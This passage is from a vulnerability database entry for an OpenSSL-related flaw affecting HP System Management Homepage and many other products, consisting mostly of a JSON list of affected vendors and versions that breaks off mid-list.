    -----BEGIN PGP SIGNATURE----- Version: PGP 8.1

    iQA/AwUBRbc7fOAfOvwtKn1ZEQJs6ACg9AMS2ZtEgsaZh7T9e8Q0OgyfmEQAni1I otH/juFiPayhwdxQwX1pZwdm =e4BA -----END PGP SIGNATURE----- . HP System Management Homepage (SMH) versions prior to 2.1.7 running on Linux and Windows.

    BACKGROUND

    RESOLUTION HP has provided System Management Homepage (SMH) version 2.1.7 or subsequent for each platform to resolve this issue

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-200609-1209",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "debian gnu linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "f5",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "freebsd",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "openpkg",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "openssl",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "oracle",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "red hat",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "suse linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "slackware linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "ubuntu",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "rpath",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "trustix secure linux",
            "version": null
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7b"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7h"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7k"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7f"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7g"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7e"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7c"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7i"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8b"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8c"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8a"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7j"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7a"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7d"
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "appgate network security",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "apple computer",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "attachmatewrq",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "blue coat",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gentoo linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gnutls",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "iaik java group",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ibm",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "internet consortium",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "intoto",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "juniper",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mandriva",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mozilla",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openwall gnu linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "opera",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "rsa security",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ssh security corp",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sybase",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "vmware",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "vandyke",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "stonesoft",
            "version": null
          },
          {
            "model": "hat red hat network satellite server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "red",
            "version": "5.0"
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.30"
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.20"
          },
          {
            "model": "wide area file services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "model": "call manager sr2c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "model": "siparator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.79"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-26000"
          },
          {
            "model": "enterprise linux es ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.5"
          },
          {
            "model": "server b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.16"
          },
          {
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "secure acs solution engine",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "computing snapgear sg565",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "3.9"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.2"
          },
          {
            "model": "ciscoworks common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.6(0)"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(1)"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.3"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "model": "cwrsync",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.10"
          },
          {
            "model": "servercluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "appliance server hosting edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.2"
          },
          {
            "model": "s8500 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.2"
          },
          {
            "model": "fuji",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "hardware management console for pseries r1.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.9"
          },
          {
            "model": "hardware management console for iseries r4.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.1.0"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "76650"
          },
          {
            "model": "css11500 content services switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.4"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "model": "project openssl b-36.8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "networks meridian option 61c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0"
          },
          {
            "model": "systems management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7.168"
          },
          {
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(1)"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.00"
          },
          {
            "model": "works common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.6(1)"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "232"
          },
          {
            "model": "s8700 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "s8300 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "linux professional oss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "8"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.9"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "model": "linux professional x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "secure linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "3.0"
          },
          {
            "model": "suse linux retail solution",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "model": "linux enterprise desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "model": "ons",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154548.0"
          },
          {
            "model": "solaris data encryption kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "x8610.0"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.1"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "appliance server workgroup edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(2)"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.11"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.2"
          },
          {
            "model": "hardware management console for iseries r5.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "s8710 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "server c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "hardware management console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2007.0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3.1"
          },
          {
            "model": "grid engine update5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "linux database server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "model": "suse linux standard server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "hardware management console for pseries r5.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2006.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(3)"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "grid engine update7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "hardware management console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.1"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "stonebeat fullcluster for raptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.2.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(0)"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.5"
          },
          {
            "model": "server 0.9.1b",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.4.0"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "model": "call manager es32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "call manager 4.1 sr4",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.6"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1-1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.14"
          },
          {
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "open-enterprise-server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(1)"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.2"
          },
          {
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.8"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.9"
          },
          {
            "model": "server a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.2"
          },
          {
            "model": "propack sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sgi",
            "version": "3.0"
          },
          {
            "model": "computing snapgear sg560",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "suse linux school server for i386",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "grid engine sun linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "model": "hardware management console for pseries r2.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.2"
          },
          {
            "model": "stonebeat fullcluster for gauntlet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "current",
            "scope": null,
            "trust": 0.3,
            "vendor": "openpkg",
            "version": null
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1050"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "networks meridian option 51c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.7"
          },
          {
            "model": "solaris data encryption kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "10.0"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3x86"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.6.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "model": "server 0.8.6a",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "-release-p3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.1"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.0"
          },
          {
            "model": "hardware management console for pseries r3.2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.10"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.1"
          },
          {
            "model": "linux professional x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "aironet acs350 c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3502.6"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0.3"
          },
          {
            "model": "linux ppc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "firewalll",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(3)"
          },
          {
            "model": "hardware management console for iseries r3.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0"
          },
          {
            "model": "multi network firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "call manager sr2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.2.0.1"
          },
          {
            "model": "call manager sr2b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "security agent",
